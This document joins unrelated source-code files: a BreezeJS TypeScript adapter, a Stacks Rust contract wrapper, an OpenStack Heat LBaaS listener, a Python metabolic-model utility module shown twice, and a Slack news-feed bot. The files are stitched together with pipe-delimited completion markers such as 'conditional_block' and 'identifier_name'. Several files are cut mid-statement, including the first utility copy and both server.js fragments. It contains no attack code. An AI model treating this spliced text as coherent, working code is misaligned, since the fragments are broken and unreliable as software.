let promise = new Promise<ISaveResult>((resolve, reject) => {
this.ajaxImpl.ajax({
type: "POST",
url: url,
dataType: 'json',
contentType: "application/json",
data: bundle,
success: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
let data = httpResponse.data;
if (data.Errors || data.errors) {
handleHttpError(reject, httpResponse);
} else {
let saveResult = adapter._prepareSaveResult(saveContext, data);
saveResult.httpResponse = httpResponse;
resolve(saveResult);
}
},
error: function (httpResponse: IHttpResponse) {
httpResponse.saveContext = saveContext;
handleHttpError(reject, httpResponse);
}
});
});
return promise;
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
The return value from this method should be a serializable object that will be sent to the server after calling JSON.stringify on it.
*/
_prepareSaveBundle(saveContext: ISaveContext, saveBundle: ISaveBundle): any {
// The implementor should call _createChangeRequestInterceptor
throw new Error("Need a concrete implementation of _prepareSaveBundle");
}
/**
Returns a constructor function for a "ChangeRequestInterceptor"
that can tweak the saveBundle both as it is built and when it is completed
by a concrete DataServiceAdapter.
Initialized with a default, no-op implementation that developers can replace with a
substantive implementation that changes the individual entity change requests
or aspects of the entire 'saveBundle' without having to write their own DataService adapters.
> let adapter = breeze.config.getAdapterInstance('dataService');
> adapter.changeRequestInterceptor = function (saveContext, saveBundle) {
> this.getRequest = function (request, entity, index) {
> // alter the request that the adapter prepared for this entity
> // based on the entity, saveContext, and saveBundle
> // e.g., add a custom header or prune the originalValuesMap
> return request;
> };
> this.done = function (requests) {
> // alter the array of requests representing the entire change-set
> // based on the saveContext and saveBundle
> };
> }
@param saveContext - The BreezeJS "context" for the save operation.
@param saveBundle - Contains the array of entities-to-be-saved (AKA, the entity change-set).
@return Constructor for a "ChangeRequestInterceptor".
**/
changeRequestInterceptor: IChangeRequestInterceptorCtor = DefaultChangeRequestInterceptor;
/** @hidden @internal */
_createChangeRequestInterceptor(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter!;
let cri = adapter.changeRequestInterceptor;
let isFn = core.isFunction;
if (isFn(cri)) {
let pre = adapter.name + " DataServiceAdapter's ChangeRequestInterceptor";
let post = " is missing or not a function.";
let interceptor = new cri(saveContext, saveBundle);
if (!isFn(interceptor.getRequest)) {
throw new Error(pre + '.getRequest' + post);
}
if (!isFn(interceptor.done)) {
        throw new Error(pre + '.done' + post);
      }
      return interceptor;
} else {
return new DefaultChangeRequestInterceptor(saveContext, saveBundle) as IChangeRequestInterceptor;
}
}
/** Abstract method that needs to be overwritten in any concrete DataServiceAdapter subclass.
This method needs to take the result returned by the server and convert it into an ISaveResult.
*/
_prepareSaveResult(saveContext: ISaveContext, data: any): ISaveResult {
throw new Error("Need a concrete implementation of _prepareSaveResult");
}
/** Utility method that may be used in any concrete DataServiceAdapter subclass to handle any
http connection issues.
*/
// Put this at the bottom of your http error analysis
static _catchNoConnectionError(err: IServerError) {
if (err.status === 0 && err.message == null) {
err.message = "HTTP response status 0 and no message. " +
"Likely did not or could not reach server. Is the server running?";
}
}
jsonResultsAdapter = new JsonResultsAdapter({
name: "noop",
visitNode: function (/* node, mappingContext, nodeContext */) {
return {};
}
});
}
function handleHttpError(reject: (reason?: any) => void, httpResponse: IHttpResponse, messagePrefix?: string) {
let err = createError(httpResponse);
AbstractDataServiceAdapter._catchNoConnectionError(err);
if (messagePrefix) {
err.message = messagePrefix + "; " + err.message;
}
reject(err);
}
function createError(httpResponse: IHttpResponse) {
let err = new Error() as IServerError;
err.httpResponse = httpResponse;
err.status = httpResponse.status;
let errObj = httpResponse.data;
if (!errObj) {
err.message = httpResponse.error && httpResponse.error.toString();
return err;
}
// some ajax providers will convert errant result into an object ( angular), others will not (jQuery)
// if not do it here.
if (typeof errObj === "string") {
try {
errObj = JSON.parse(errObj);
} catch (e) {
      // not valid JSON: fall back to the raw string as the message
      err.message = errObj;
      return err;
    }
  }
  // assumption: surface a conventional "message" field when the parsed payload has one
  err.message = errObj.message || err.message;
  return err;
}
contracts.rs
// Copyright (C) 2013-2020 Blockstack PBC, a public benefit corporation
// Copyright (C) 2020 Stacks Open Internet Foundation
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program. If not, see <http://www.gnu.org/licenses/>.
use std::convert::TryInto;
use vm::ast::ContractAST;
use vm::callables::CallableType;
use vm::contexts::{ContractContext, Environment, GlobalContext, LocalContext};
use vm::errors::InterpreterResult as Result;
use vm::representations::SymbolicExpression;
use vm::types::QualifiedContractIdentifier;
use vm::{apply, eval_all, Value};
#[derive(Serialize, Deserialize)]
pub struct Contract {
pub contract_context: ContractContext,
}
// AARON: this is an increasingly useless wrapper around a ContractContext struct.
// will probably be removed soon.
impl Contract {
pub fn initialize_from_ast(
contract_identifier: QualifiedContractIdentifier,
contract: &ContractAST,
global_context: &mut GlobalContext,
) -> Result<Contract> {
let mut contract_context = ContractContext::new(contract_identifier);
eval_all(&contract.expressions, &mut contract_context, global_context)?;
Ok(Contract {
contract_context: contract_context,
})
}
}
listener.py
#
# Copyright 2015 IBM Corp.
#
# All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources.openstack.neutron import neutron
from heat.engine import support
from heat.engine import translation
class Listener(neutron.NeutronResource):
"""A resource for managing LBaaS v2 Listeners.
This resource creates and manages Neutron LBaaS v2 Listeners,
which represent a listening endpoint for the vip.
"""
support_status = support.SupportStatus(version='6.0.0')
required_service_extension = 'lbaasv2'
PROPERTIES = (
PROTOCOL_PORT, PROTOCOL, LOADBALANCER, NAME,
ADMIN_STATE_UP, DESCRIPTION, DEFAULT_TLS_CONTAINER_REF,
SNI_CONTAINER_REFS, CONNECTION_LIMIT, TENANT_ID
) = (
'protocol_port', 'protocol', 'loadbalancer', 'name',
'admin_state_up', 'description', 'default_tls_container_ref',
'sni_container_refs', 'connection_limit', 'tenant_id'
)
PROTOCOLS = (
TCP, HTTP, HTTPS, TERMINATED_HTTPS,
) = (
'TCP', 'HTTP', 'HTTPS', 'TERMINATED_HTTPS',
)
ATTRIBUTES = (
LOADBALANCERS_ATTR, DEFAULT_POOL_ID_ATTR
) = (
'loadbalancers', 'default_pool_id'
)
properties_schema = {
PROTOCOL_PORT: properties.Schema(
properties.Schema.INTEGER,
_('TCP or UDP port on which to listen for client traffic.'),
required=True,
constraints=[
constraints.Range(1, 65535),
]
),
PROTOCOL: properties.Schema(
properties.Schema.STRING,
_('Protocol on which to listen for the client traffic.'),
required=True,
constraints=[
constraints.AllowedValues(PROTOCOLS),
]
),
LOADBALANCER: properties.Schema(
properties.Schema.STRING,
_('ID or name of the load balancer with which listener '
'is associated.'),
required=True,
constraints=[
constraints.CustomConstraint('neutron.lbaas.loadbalancer')
]
),
NAME: properties.Schema(
properties.Schema.STRING,
_('Name of this listener.'),
update_allowed=True
),
ADMIN_STATE_UP: properties.Schema(
properties.Schema.BOOLEAN,
_('The administrative state of this listener.'),
update_allowed=True,
default=True
),
DESCRIPTION: properties.Schema(
properties.Schema.STRING,
_('Description of this listener.'),
update_allowed=True,
default=''
),
DEFAULT_TLS_CONTAINER_REF: properties.Schema(
properties.Schema.STRING,
_('Default TLS container reference to retrieve TLS '
'information.'),
update_allowed=True
),
SNI_CONTAINER_REFS: properties.Schema(
properties.Schema.LIST,
_('List of TLS container references for SNI.'),
update_allowed=True
),
CONNECTION_LIMIT: properties.Schema(
properties.Schema.INTEGER,
_('The maximum number of connections permitted for this '
'load balancer. Defaults to -1, which is infinite.'),
update_allowed=True,
default=-1,
constraints=[
constraints.Range(min=-1),
]
),
TENANT_ID: properties.Schema(
properties.Schema.STRING,
_('The ID of the tenant who owns the listener.')
),
}
attributes_schema = {
LOADBALANCERS_ATTR: attributes.Schema(
_('ID of the load balancer this listener is associated to.'),
type=attributes.Schema.LIST
),
DEFAULT_POOL_ID_ATTR: attributes.Schema(
_('ID of the default pool this listener is associated to.'),
type=attributes.Schema.STRING
)
}
def translation_rules(self, props):
return [
translation.TranslationRule(
props,
translation.TranslationRule.RESOLVE,
[self.LOADBALANCER],
client_plugin=self.client_plugin(),
finder='find_resourceid_by_name_or_id',
entity='loadbalancer'
),
]
def validate(self):
res = super(Listener, self).validate()
if res:
return res
if self.properties[self.PROTOCOL] == self.TERMINATED_HTTPS:
if self.properties[self.DEFAULT_TLS_CONTAINER_REF] is None:
msg = (_('Property %(ref)s required when protocol is '
'%(term)s.') % {'ref': self.DEFAULT_TLS_CONTAINER_REF,
'term': self.TERMINATED_HTTPS})
raise exception.StackValidationFailed(message=msg)
def _check_lb_status(self):
lb_id = self.properties[self.LOADBALANCER]
return self.client_plugin().check_lb_status(lb_id)
def handle_create(self):
properties = self.prepare_properties(
self.properties,
self.physical_resource_name())
properties['loadbalancer_id'] = properties.pop(self.LOADBALANCER)
return properties
def check_create_complete(self, properties):
if self.resource_id is None:
try:
listener = self.client().create_listener(
{'listener': properties})['listener']
self.resource_id_set(listener['id'])
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
def _show_resource(self):
return self.client().show_listener(
self.resource_id)['listener']
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
self._update_called = False
return prop_diff
def check_update_complete(self, prop_diff):
if not prop_diff:
return True
if not self._update_called:
try:
self.client().update_listener(self.resource_id,
{'listener': prop_diff})
self._update_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
raise
return self._check_lb_status()
    def handle_delete(self):
self._delete_called = False
def check_delete_complete(self, data):
if self.resource_id is None:
return True
if not self._delete_called:
try:
self.client().delete_listener(self.resource_id)
self._delete_called = True
except Exception as ex:
if self.client_plugin().is_invalid(ex):
return False
elif self.client_plugin().is_not_found(ex):
return True
raise
return self._check_lb_status()
def resource_mapping():
return {
'OS::Neutron::LBaaS::Listener': Listener,
}
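# --- Illustrative sketch (not Heat source): how the engine consumes the
# handle_*/check_*_complete pairs above. Each handle_<action>() runs once and
# its return value is fed to the matching check_<action>_complete() poll until
# that poll reports True. `resource` stands in for a Listener instance wired
# to real Neutron clients; the names below are placeholders, not Heat APIs.
import time

def _drive_action(resource, action):
    handle = getattr(resource, "handle_%s" % action)    # e.g. handle_create
    check = getattr(resource, "check_%s_complete" % action)
    token = handle()    # fits 'create'/'delete'; handle_update takes arguments
    while not check(token):
        time.sleep(1)   # the real engine reschedules tasks instead of sleeping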
functions.py
from collections import defaultdict
from six import iteritems
def invert_mapping(mapping):
""" Invert a mapping dictionary
Parameters
----------
mapping: dict
Returns
-------
"""
inverted_mapping = defaultdict(list)
for key, value in mapping.items():
if isinstance(value, (list, set)):
for element in value:
inverted_mapping[element].append(key)
else:
inverted_mapping[value].append(key)
return inverted_mapping
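# Example (illustrative, not part of the original module): scalar and
# collection values both invert to lists of keys.
#   >>> dict(invert_mapping({"r1": ["m1", "m2"], "r2": "m2"}))
#   {'m1': ['r1'], 'm2': ['r1', 'r2']}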
def generate_copy_id(base_id, collection, suffix="_copy"):
""" Generate a new id that is not present in collection
Parameters
----------
base_id: str, Original id while copying or New for new entries
collection: dict or list
suffix: str, Suffix that is added to the base id
Returns
-------
"""
composite_id = str(base_id) + suffix
new_id = composite_id
n = 0
# Make sure there is no metabolite with the same id
while new_id in collection:
# Add number to end of id
n += 1
new_id = composite_id + str(n)
return new_id
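# Example (illustrative): the suffix is numbered until the id is unused.
#   >>> generate_copy_id("R1", {"R1", "R1_copy", "R1_copy1"})
#   'R1_copy2'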
def get_annotation_to_item_map(list_of_items):
""" Find model items with overlapping annotations
Parameters
----------
    list_of_items: list
Returns
-------
"""
annotation_to_item = defaultdict(list)
for item in list_of_items:
for annotation in item.annotation:
annotation_to_item[annotation].append(item)
return annotation_to_item
def convert_to_bool(input_str):
    """ Convert string of boolean value to actual boolean
    PyQt5 stores boolean values as strings 'true' and 'false'
    in the settings. In order to use those stored values
    they need to be converted back to the boolean values.
    Parameters
    ----------
    input_str: str
    Returns
    -------
    bool
    """
    mapping = {"true": True,
               "false": False,
               "none": None}
    if isinstance(input_str, bool):
        return input_str
    elif not isinstance(input_str, str):
raise TypeError("Input should be a string or boolean")
else:
return mapping[input_str.lower()]
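# Example (illustrative): round-tripping strings that PyQt5 settings produce.
#   >>> convert_to_bool("True"), convert_to_bool("false"), convert_to_bool("none")
#   (True, False, None)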
def check_charge_balance(metabolites):
""" Check charge balance of the reaction """
# Check that charge is set for all metabolites
if not all(x.charge is not None for x in metabolites.keys()):
return None
else:
return sum([metabolite.charge * coefficient for metabolite, coefficient in iteritems(metabolites)])
def check_element_balance(metabolites):
""" Check that the reaction is elementally balanced """
metabolite_elements = defaultdict(int)
for metabolite, coefficient in iteritems(metabolites):
for element, count in iteritems(metabolite.elements):
metabolite_elements[element] += coefficient * count
return {k: v for k, v in iteritems(metabolite_elements) if v != 0}
def reaction_string(stoichiometry, use_metabolite_names=True):
"""Generate the reaction string """
attrib = "id"
if use_metabolite_names:
attrib = "name"
educts = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value < 0.]
products = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value > 0.]
return " + ".join([" ".join(x) for x in educts])+" --> "+" + ".join([" ".join(x) for x in products])
def unbalanced_metabolites_to_string(in_dict):
substrings = ['{0}: {1:.1f}'.format(*x) for x in in_dict.items()]
return "<br>".join(substrings)
def reaction_balance(metabolites):
""" Check the balancing status of the stoichiometry
Parameters
----------
metabolites : dict - Dictionary of metabolites with stoichiometric coefficnets
Returns
-------
charge_str : str or bool
element_str : str or bool
balanced : str or bool
"""
element_result = check_element_balance(metabolites)
charge_result = check_charge_balance(metabolites)
if charge_result is None:
charge_str = "Unknown"
elif charge_result == 0:
charge_str = "OK"
else:
charge_str = str(charge_result)
if not all(x.formula for x in metabolites.keys()):
element_str = "Unknown"
elif element_result == {}:
element_str = "OK"
else:
element_str = unbalanced_metabolites_to_string(element_result)
if len(metabolites) < 2:
balanced = None
elif element_str == "OK" and charge_str == "OK":
balanced = True
elif element_str not in ("OK", "Unknown") or charge_str not in ("OK", "Unknown"):
balanced = False
else:
balanced = "Unknown"
return charge_str, element_str, balanced
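# Worked example with a hypothetical stand-in for the metabolite objects the
# checks above expect (only .charge, .formula and .elements are consulted):
#   class _M:
#       def __init__(self, charge, elements):
#           self.charge, self.elements = charge, elements
#           self.formula = "".join("%s%s" % kv for kv in elements.items())
#   h2, o2, h2o = _M(0, {"H": 2}), _M(0, {"O": 2}), _M(0, {"H": 2, "O": 1})
#   reaction_balance({h2: -2.0, o2: -1.0, h2o: 2.0})  # -> ('OK', 'OK', True)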
def merge_groups_by_overlap(data):
""" Merge sets
Parameters
----------
data: list
Returns
-------
"""
new_index = list(range(len(data)))
mapping = dict()
data = [set(m) for m in data]
# Iterate over groups in data and merge groups
# to the one with the lowest index
for i, group in enumerate(data):
for element in group:
if element not in mapping:
# Element has not been seen before
# point element to current index
mapping[element] = i
continue
else:
# Get the new location location of the group
# to which the element mapping points
destination = new_location(new_index, mapping[element])
if destination == i:
# Group has already been merged
continue
elif destination > i:
# Merge to lowest index always
destination, i = i, destination
# Merge current group with the one
# the item has been found in before
data[destination].update(data[i])
data[i] = None
# Store new index of group
new_index[i] = destination
i = destination
# Filter out the empty groups
return [g for g in data if g]
def new_location(new_index, n):
""" Find new location
Iteratively follow pointers to new location.
Parameters
----------
new_index: list, Should be initialized from range
n: int
Returns
-------
int
"""
while new_index[n] != n:
n = new_index[n]
return n
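# Example (illustrative): groups sharing any element collapse into one set;
# new_location() chases the index pointers left behind by earlier merges.
#   >>> merge_groups_by_overlap([{1, 2}, {3, 4}, {2, 3}, {5}])
#   [{1, 2, 3, 4}, {5}]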
def unpack(iterable, cls):
""" Unpack the value
Parameters
----------
iterable
cls
Returns
-------
"""
if len(iterable) == 1:
return iterable.pop()
else:
return cls(iterable)
def text_is_different(input, state):
""" Check if the input is different from output
Test if the input is different to the output
while ignoring the difference between None
and empty string.
Parameters
----------
input: str or None
state: str
Returns
-------
bool
"""
if not input and not state:
return False
else:
return input != state
def restore_state(object, state):
""" Restore the state of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreState(state)
def restore_geometry(object, state):
""" Restore the geometry of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreGeometry(state)
def split_dict_by_value(dictionary):
""" Split dictionary by values
This functions splits dictionary entries based
on the value into positive, negative and zero
dictionaries.
Parameters
----------
dictionary: dict,
Input dictionary
Returns
-------
positive: dict,
Dictionary containg all items with positive value
negative: dict,
Dictionary cotaining all items with negative value
zero: dict,
Dictionary containing all items with zero value
"""
positive, negative, zero = {}, {}, {}
for k, v in dictionary.items():
if v > 0.:
positive[k] = v
elif v < 0.:
negative[k] = v
else:
zero[k] = v
    return positive, negative, zero
functions.py | from collections import defaultdict
from six import iteritems
def invert_mapping(mapping):
""" Invert a mapping dictionary
Parameters
----------
mapping: dict
Returns
-------
"""
inverted_mapping = defaultdict(list)
for key, value in mapping.items():
if isinstance(value, (list, set)):
for element in value:
|
else:
inverted_mapping[value].append(key)
return inverted_mapping
def generate_copy_id(base_id, collection, suffix="_copy"):
""" Generate a new id that is not present in collection
Parameters
----------
base_id: str, Original id while copying or New for new entries
collection: dict or list
suffix: str, Suffix that is added to the base id
Returns
-------
"""
composite_id = str(base_id) + suffix
new_id = composite_id
n = 0
# Make sure there is no metabolite with the same id
while new_id in collection:
# Add number to end of id
n += 1
new_id = composite_id + str(n)
return new_id
def get_annotation_to_item_map(list_of_items):
""" Find model items with overlapping annotations
Parameters
----------
item
list_of_items
Returns
-------
"""
annotation_to_item = defaultdict(list)
for item in list_of_items:
for annotation in item.annotation:
annotation_to_item[annotation].append(item)
return annotation_to_item
def convert_to_bool(input_str):
""" Convert string of boolean value to actual bolean
PyQt5 stores boolean values as strings 'true' and 'false
in the settings. In order to use those stored values
they need to be converted back to the boolean values.
Parameters
----------
input_str: str
Returns
-------
bool
"""
mapping = {"true": True,
"false": False,
"none": None}
if isinstance(input_str, bool):
return input_str
elif not isinstance(input_str, str):
raise TypeError("Input should be a string or boolean")
else:
return mapping[input_str.lower()]
def check_charge_balance(metabolites):
""" Check charge balance of the reaction """
# Check that charge is set for all metabolites
if not all(x.charge is not None for x in metabolites.keys()):
return None
else:
return sum([metabolite.charge * coefficient for metabolite, coefficient in iteritems(metabolites)])
def check_element_balance(metabolites):
""" Check that the reaction is elementally balanced """
metabolite_elements = defaultdict(int)
for metabolite, coefficient in iteritems(metabolites):
for element, count in iteritems(metabolite.elements):
metabolite_elements[element] += coefficient * count
return {k: v for k, v in iteritems(metabolite_elements) if v != 0}
def reaction_string(stoichiometry, use_metabolite_names=True):
"""Generate the reaction string """
attrib = "id"
if use_metabolite_names:
attrib = "name"
educts = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value < 0.]
products = [(str(abs(value)), getattr(key, attrib)) for key, value in iteritems(stoichiometry) if value > 0.]
return " + ".join([" ".join(x) for x in educts])+" --> "+" + ".join([" ".join(x) for x in products])
def unbalanced_metabolites_to_string(in_dict):
substrings = ['{0}: {1:.1f}'.format(*x) for x in in_dict.items()]
return "<br>".join(substrings)
def reaction_balance(metabolites):
""" Check the balancing status of the stoichiometry
Parameters
----------
metabolites : dict - Dictionary of metabolites with stoichiometric coefficnets
Returns
-------
charge_str : str or bool
element_str : str or bool
balanced : str or bool
"""
element_result = check_element_balance(metabolites)
charge_result = check_charge_balance(metabolites)
if charge_result is None:
charge_str = "Unknown"
elif charge_result == 0:
charge_str = "OK"
else:
charge_str = str(charge_result)
if not all(x.formula for x in metabolites.keys()):
element_str = "Unknown"
elif element_result == {}:
element_str = "OK"
else:
element_str = unbalanced_metabolites_to_string(element_result)
if len(metabolites) < 2:
balanced = None
elif element_str == "OK" and charge_str == "OK":
balanced = True
elif element_str not in ("OK", "Unknown") or charge_str not in ("OK", "Unknown"):
balanced = False
else:
balanced = "Unknown"
return charge_str, element_str, balanced
def merge_groups_by_overlap(data):
""" Merge sets
Parameters
----------
data: list
Returns
-------
"""
new_index = list(range(len(data)))
mapping = dict()
data = [set(m) for m in data]
# Iterate over groups in data and merge groups
# to the one with the lowest index
for i, group in enumerate(data):
for element in group:
if element not in mapping:
# Element has not been seen before
# point element to current index
mapping[element] = i
continue
else:
# Get the new location of the group
# to which the element mapping points
destination = new_location(new_index, mapping[element])
if destination == i:
# Group has already been merged
continue
elif destination > i:
# Merge to lowest index always
destination, i = i, destination
# Merge current group with the one
# the item has been found in before
data[destination].update(data[i])
data[i] = None
# Store new index of group
new_index[i] = destination
i = destination
# Filter out the empty groups
return [g for g in data if g]
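# Hedged example (added): groups sharing an element collapse into one set;
# disjoint groups survive unchanged.
assert merge_groups_by_overlap([[1, 2], [2, 3], [7]]) == [{1, 2, 3}, {7}]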
def new_location(new_index, n):
""" Find new location
Iteratively follow pointers to new location.
Parameters
----------
new_index: list, Should be initialized from range
n: int
Returns
-------
int
"""
while new_index[n] != n:
n = new_index[n]
return n
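# Hedged example (added): pointers are chased until a self-reference, so
# index 2 -> 1 -> 0 resolves to 0.
assert new_location([0, 0, 1], 2) == 0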
def unpack(iterable, cls):
""" Unpack the value
Parameters
----------
iterable
cls
Returns
-------
"""
if len(iterable) == 1:
return iterable.pop()
else:
return cls(iterable)
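# Hedged examples (added): singletons collapse to their element; anything
# larger is handed to cls.
assert unpack({"only"}, list) == "only"
assert unpack({1, 2}, sorted) == [1, 2]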
def text_is_different(input, state):
""" Check if the input is different from output
Test if the input is different to the output
while ignoring the difference between None
and empty string.
Parameters
----------
input: str or None
state: str
Returns
-------
bool
"""
if not input and not state:
return False
else:
return input != state
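# Hedged examples (added): None and "" count as equal; anything else is a
# plain inequality check.
assert text_is_different(None, "") is False
assert text_is_different("", "x") is True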
def restore_state(object, state):
""" Restore the state of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreState(state)
def restore_geometry(object, state):
""" Restore the geometry of an object
Parameters
----------
object: Object which should be restored
state: State from settings
Returns
-------
"""
if state:
object.restoreGeometry(state)
def split_dict_by_value(dictionary):
""" Split dictionary by values
This functions splits dictionary entries based
on the value into positive, negative and zero
dictionaries.
Parameters
----------
dictionary: dict,
Input dictionary
Returns
-------
positive: dict,
Dictionary containing all items with positive value
negative: dict,
Dictionary containing all items with negative value
zero: dict,
Dictionary containing all items with zero value
"""
positive, negative, zero = {}, {}, {}
for k, v in dictionary.items():
if v > 0.:
positive[k] = v
elif v < 0.:
negative[k] = v
else:
zero[k] = v
return positive, negative, zero
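# Hedged example (added): a stoichiometry-like dict split by coefficient sign.
_pos, _neg, _zero = split_dict_by_value({"a": 1.5, "b": -2.0, "c": 0.0})
assert (_pos, _neg, _zero) == ({"a": 1.5}, {"b": -2.0}, {"c": 0.0})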
| inverted_mapping[element].append(key) | conditional_block |
server.js | (", ")) {
req.body.companies = req.body.companies.replace(/,/g, ", ")
}
fields.push({
title: "Companies",
short: false,
value: req.body.companies
})
}
if (req.body.word_count) {
var length = req.body.word_count
var prefix = ""
if (length > 1000 )
prefix = ":snail: "
else if (length < 300)
prefix = ":fast_forward: "
fields.push({
title: "Length",
short: true,
value: `${prefix}${length} words`
})
}
if (req.body.shares) {
fields.push({
title: "Shares",
short: true,
value: formatCount(req.body.shares)
})
}
if (req.body.sentiment) {
var sentiment
switch (req.body.sentiment) {
case "negative":
sentiment = ":rage: Negative";
break;
case "positive":
sentiment = ":smile: Positive";
break;
case "neutral":
sentiment = "Neutral"
break;
}
fields.push({
title: "Sentiment",
short: true,
value: sentiment
})
}
// Unsupported for now
// fields.push({
// "title": "Sponsored",
// "value": ":warning: Undetected",
// "short": true
// })
attachment.fields = fields
slackAPIClient.send('chat.postMessage',
{
channel,
attachments: [attachment]
},
(err, response) => {
if (err) {
console.log(err)
res.status(500).send(err)
} else {
res.status(201).send(response)
}
}
)
}
)
slapp.command('/feeds', 'list', (msg, text) => {
ncClient.list().then (feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`*Here is the list of all feeds:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', /connect (\d+)/, (msg, text, id) => {
msg.respond(`To connect a feed to this channel, please just put the id (${id}) as the channel topic (at the top)`)
})
slapp.command('/feeds', 'create (.+)', (msg, text, name) => {
ncClient.create(name).then(() => {
return ncClient.list()
}).then(feeds => {
var lines = feeds.map(feed => {
return `${feed.id}. ${feed.name} (${feed.sources.length} source${feed.sources.length === 1 ? '' : 's'})`
})
msg.respond(`:white_check_mark: Successfully created feed ${name}, here is the list of all feeds:\n${lines.join("\n")}`)
}).catch(() => {
msg.respond("Error creating feed")
})
})
slapp.command('/feeds', 'add (.+)', (msg, text, url) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return new Promise ((resolve, reject) => {
ncClient.add(feedId, url).then(() => { resolve(feedId)}).catch(e => { reject(e)})
})
	}).then(feedId => {
		return ncClient.listSources(feedId)
}).then(result => {
var lines = result.sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
msg.respond(`:white_check_mark: Successfully added source ${url}, here is the list of all sources in the feed now:\n${lines.join("\n")}`)
}).catch((e) => {
console.log(e)
msg.respond("Error adding source")
})
})
slapp.command('/feeds', 'sources', (msg, text) => {
getConnectedFeedId(msg.meta.channel_id).then(feedId => {
return ncClient.listSources(feedId)
}).then(sources => {
var lines = sources.map(source => {
if (source.source.type == 'rss') {
return `RSS: ${source.source.url}`
} else if (source.source.type =='search') {
return `Search: "${source.source.keywords}"`
} else if (source.source.type == 'channel') {
return `Channel: ${source.source.id}. ${source.source.name}`
}
})
msg.respond(`*Here is a list of all sources in the current feed:*\n${lines.join("\n")}`)
})
})
slapp.command('/feeds', '(help)?', (msg, text) => {
msg.respond(`Valid commands: \`list\`, \`connect\`, \`create\`, \`add\`, \`sources\`, \`help\`.
To show the currently connected feed: \`/feeds\`
To list all available feeds: \`/feeds list\`
To connect a feed to this channel: \`/feeds connect <id>\` (Take ID from /feeds list)
To create and connect a new feed: \`/feeds create <name>\`
To add an RSS source to the connected feed: \`/feeds add <url>\`
To list the sources in the connected feed: \`/feeds sources\``)
})
slapp.action('share', 'post', (msg, value) => {
var sharedInChannel = true
if (!value) {
sharedInChannel = false
value = msg.body.actions[0].selected_options[0].value
}
var url = msg.body.original_message.attachments[0].title_link
var userId = msg.body.user.id
var originalMsg = msg.body.original_message;
var chosenAttachment = originalMsg.attachments[msg.body.attachment_id - 1]
addUrlToChannel(value, url)
.then(() => {
var attachment = {
color: '#006600',
text: `${url}
:postbox: Article posted to channel ${value} by <@${userId}>`
}
originalMsg.attachments = []
if (!sharedInChannel) {
originalMsg.attachments.push(chosenAttachment)
}
originalMsg.attachments.push(attachment)
msg.respond(msg.body.response_url, originalMsg)
})
.catch((err) => {
console.log(err)
chosenAttachment.color = '#ff9933'
var lastAttachment = {
pretext: `:exclamation: Error posting article to channel ${value}`
}
originalMsg.attachments = [chosenAttachment, lastAttachment]
msg.respond(msg.body.response_url, originalMsg)
})
})
function getConnectedFeedId(channelId) {
return new Promise((resolve, reject) => {
slackAPIClient.send('channels.info',
{
channel: channelId
},
(err, response) => {
if (err) return reject(err)
resolve(response.channel.topic.value)
}
)
})
}
function addUrlToChannel(channelId, url) {
return new Promise((resolve, reject) => {
request.post('http://itao-server-55663464.eu-central-1.elb.amazonaws.com/itao/item/add/url',
{body: url}, (err, res, body) => {
if (err) return reject(err);
try {
JSON.parse(body)[0]
console.log(`Successfully created item ${url}: ${body}`)
} catch (err) {
return reject(err + JSON.stringify(body));
}
var payload = {
channel_id: channelId,
url: url
}
request.post('http://itao-server-55663464.eu-central-1.elb.amazonaws.com/itao/channel/item/add',
{ json: payload}, (err2, res2, body2) => {
			if (err2) return reject(err2);
try {
var success = body2.success
if (!success) return reject(`Error posting to http://itao-server-55663464.eu-central-1.elb.amazonaws.com/itao/channel/item/add with body ${JSON.stringify(payload)}
Got back ${JSON.stringify(body2)}`);
} catch (err) {
				return reject(err + JSON.stringify(body2));
}
resolve();
})
})
})
}
slapp.action('share', 'discard', (msg, value) => {
var originalMsg = msg.body.original_message
var url = msg.body.original_message.attachments[0].title_link
var userId = msg.body.user.id
var chosenAttachment = originalMsg.attachments[msg.body.attachment_id - 1]
chosenAttachment.actions = []
var attachment = {
color: '#800000',
text: `${url}
:no_entry: Article discarded by <@${userId}>`,
}
originalMsg.attachments = [attachment]
msg.respond(msg.body.response_url, originalMsg)
})
function | fetchChannels | identifier_name |
|
server.js | "text":"136 - IBM in the Media",
"value":136
},
{
"text":"151 - Randstad in the News",
"value":151
},
{
"text":"152 - Randstad Market Watch",
"value":152
},
{
"text":"170 - IBM Cloud Market Watch",
"value":170
},
{
"text":"219 - IBM Developer Advocates",
